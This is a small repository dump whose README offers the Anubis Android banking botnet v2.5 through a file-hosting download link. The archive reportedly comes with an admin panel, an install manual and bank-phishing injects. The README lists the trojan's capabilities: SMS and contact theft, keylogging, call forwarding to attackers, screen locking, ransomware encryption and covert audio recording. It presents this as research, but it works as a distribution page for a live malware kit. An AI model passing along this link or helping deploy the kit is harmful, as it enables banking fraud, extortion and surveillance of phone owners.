======================: FILES :======================
Android_Botnet
└── README.md

0 directories, 1 file
======================: README CONTENT :======================
# Anubis Android Banking Botnet v.2.5

Решил добавить ботнет Anubis который у всех на слуху с целью исследовать его поковырять код.. 
Anubis Android Banking Botnet v.2.5 | https://bayfiles.com/A212B6f3nb/Anubis_2.5_rar



# Included admin + arc + installation manual
# 235 inject banks, bills, crypt, grabbers ss
# The description is not complete as the bot was finished by itself
# Send SMS - send SMS with the specified text to the number specified in the command;
# Start USSD - execute a USSD request;
# Start Application - launch the application specified in the command;
# Replace URL Admin Panel / Forwarding - change the address of the managing server;
# Get All SMS - send copies of SMS stored on the device to the managing server;
# Get All Installed Applications - get information about installed applications;
# Get All Permissions - check the availability of additional permissions to work;
# Get Logs Keylogger - start intercepting keystrokes;
# Show Message Box - show the dialog box with the text specified in the command;
# Show Push Notification - show push notifications whose contents are specified in the command;
# Show Automatically Push Notification - show a push notification whose content is specified in the Trojan's code;
# Start Fake-Locker - block the device screen by the WebView window, which will show the contents of the web page specified by the server;
# Get Numbers From Phone Book - transfer all numbers from the phone book to the server;
# Sending SMS to your Contacts - send SMS to all contacts from the phone book;
# Request Permission For Injection - request permission to access data;
# Request Permission For Geolocation - request permission to determine the location of the device;
# Start Accessibility Service — request access to accessibility features;
# Start Permission - request access to additional permissions;
# Start Forward Calls - start forwarding calls to the number specified by the attackers;
# Stop Forward Calls - stop call forwarding;
# Open Link in Browser - open the specified link in the browser;
# Open Link in Activity - open a link to a web page in a WebView;
# CryptoLocker - encrypt files stored on the device and show a message with a ransom request;
# Decrypt File System - decrypt files;
# Record Sound - start recording the environment using the microphone built into the device;
# Get IP Bot - determine the IP address of the device;
# Kill Bot - clear the Trojan’s configuration file and stop the malicious application.
====================== GIT HISTORY: ======================
8a0d6f0 HEAD@{0}: clone: from https://github.com/NBG0x1/Android_Botnet
commit 8a0d6f04eac64bc9a488464bcd6a19b86062f052
Author: NBG0x1 <maikblackvud@gmail.com>
Date:   Mon May 20 17:52:27 2019 +0500

    Update README.md

commit 2f0d707f2498362ef650ff70ac9c87fe453d17c8
Author: NBG0x1 <maikblackvud@gmail.com>
Date:   Mon May 20 17:49:21 2019 +0500

    Update README.md

commit 7841903ceb080f619ea5033750b968d2d30a2a93
Author: NBG0x1 <maikblackvud@gmail.com>
Date:   Mon May 20 17:48:16 2019 +0500

    Update README.md

commit 8eca446fdbb665c0d1d8dc3d6f8b9fc3f463ec6e
Author: NBG0x1 <maikblackvud@gmail.com>
Date:   Mon May 20 17:45:13 2019 +0500

    Initial commit
